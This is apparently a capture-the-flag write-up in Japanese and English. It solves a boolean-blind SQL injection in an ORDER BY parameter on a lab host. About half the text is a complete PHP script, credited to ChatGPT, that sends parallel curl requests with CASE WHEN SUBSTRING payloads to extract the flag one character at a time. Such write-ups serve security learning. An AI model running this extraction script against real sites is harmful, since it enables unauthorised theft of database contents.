バナーからSQLiの問題だとわかる。普通に80で簡単なサイトがあるのでSQLiを探す。
I saw it's a SQLi problem and found SQLi.
テーブルは4カラム
Table has 4 columns
Sqlmapでとれなかったのでしかたなくブラインドでやる😥
I couldn't get credentials with Sqlmap, so I had to do it with boolean based blind.
True(order by title)
False(order by date)
本当はレスポンスコードかContentLengthが異なるようにPayloadを組みたかったができなかった(TrueもFalseも同じLengthなので内容を確認する必要がある。これが地獄の始まり)。UNION SELECTもうまくできず。😞
I wanted to make the Payload so that the response code or Content Length was different, but I couldn't do it and UNION SELECT didn't work either.Since both True and False have the same Length, it's necessary to check the contents.
SQL確認用 https://sqliteonline.com/
一文字ずつIntruderをまわし、レスポンスから文字を特定。
Use the Intruder by one character and identify the letter from the response.
全部やってみるとわかるが、もう一方のテーブル名はtodosで4カラム。flagは1カラム。
If you do it all, you'll see that the other table name is todos and has 4 columns. flag has 1 column.
同じ要領でflag特定。 Get the flag value same way.
🚩 Congratulations! Thank you for your time, Happy hacking. 🌕🍡🌕🍡🌕🍡
今回はマルチのCURLで高速化をはかった。 またもちゃっとGPTにつくってもらった。感謝
<?php
echo "------ START ----- \n";
$flag = "";
$FLAGLEN=38;
$URL='http://10.10.143.81/';
$SEARCHDATE='2023-08-01';
$SEARCHDATELEN=101;
$strings = array(
"0","1","2","3","4","5","6","7","8","9",
"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z",
"A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z",
"!","#","$","%","&","(",")","~","=","|","^","-","`","{","[","@","]","}","*",":",";","+","<",">","%20",".",
"?","_" );
for ($i = 0; $i < $FLAGLEN; $i++) {
// prm作成
$prm = array();
for ($j = 0; $j < count($strings); $j++) {
$prm[$j] = '?order=(CASE+WHEN(SUBSTRING((SELECT+*+FROM+flag),'.($i + 1).',1)=%27'.$strings[$j].'%27)+THEN+title+ELSE+date+END)';
}
// CURL
$mh = curl_multi_init(); // CURLマルチハンドルを初期化
$handles = array();
// 各URLに対してCURLハンドルを作成しマルチハンドルに追加
foreach ($prm as $prm) {
$ch = curl_init($URL.$prm);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_multi_add_handle($mh, $ch);
$handles[] = $ch;
}
// マルチハンドルで複数のリクエストを同時に実行
$running = null;
do {
curl_multi_exec($mh, $running);
} while ($running > 0);
// 各リクエストのレスポンスを処理
foreach ($handles as $ch) {
$response = curl_multi_getcontent($ch);
// レスポンスを行ごとに分割
$responseLines = explode("\n", $response);
// 行ごとに "2023-08-01" を探す
foreach ($responseLines as $lineNumber => $line) {
if (strpos($line, $SEARCHDATE) !== false) {
$target = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
//$target = http://10.10.143.81/?order=(CASE+WHEN(SUBSTRING((SELECT+*+FROM+flag),1,1)=%27c%27)+THEN+title+ELSE+date+END)
//echo 'URL: ' . $target . ' の行数: ' . $lineNumber."\n";
if ($lineNumber != $SEARCHDATELEN) {
// flagの文字列の切り出し
if (preg_match('/%27.%27/', $target, $char)) {
$str = str_replace('%27', '', $char[0]);
echo $str;
$flag = $flag.$str;
}
}
}
}
curl_multi_remove_handle($mh, $ch);
curl_close($ch);
}
curl_multi_close($mh);
}
//echo "FLAG:".$flag."\n";
echo "\n------ END ------- \n";
?>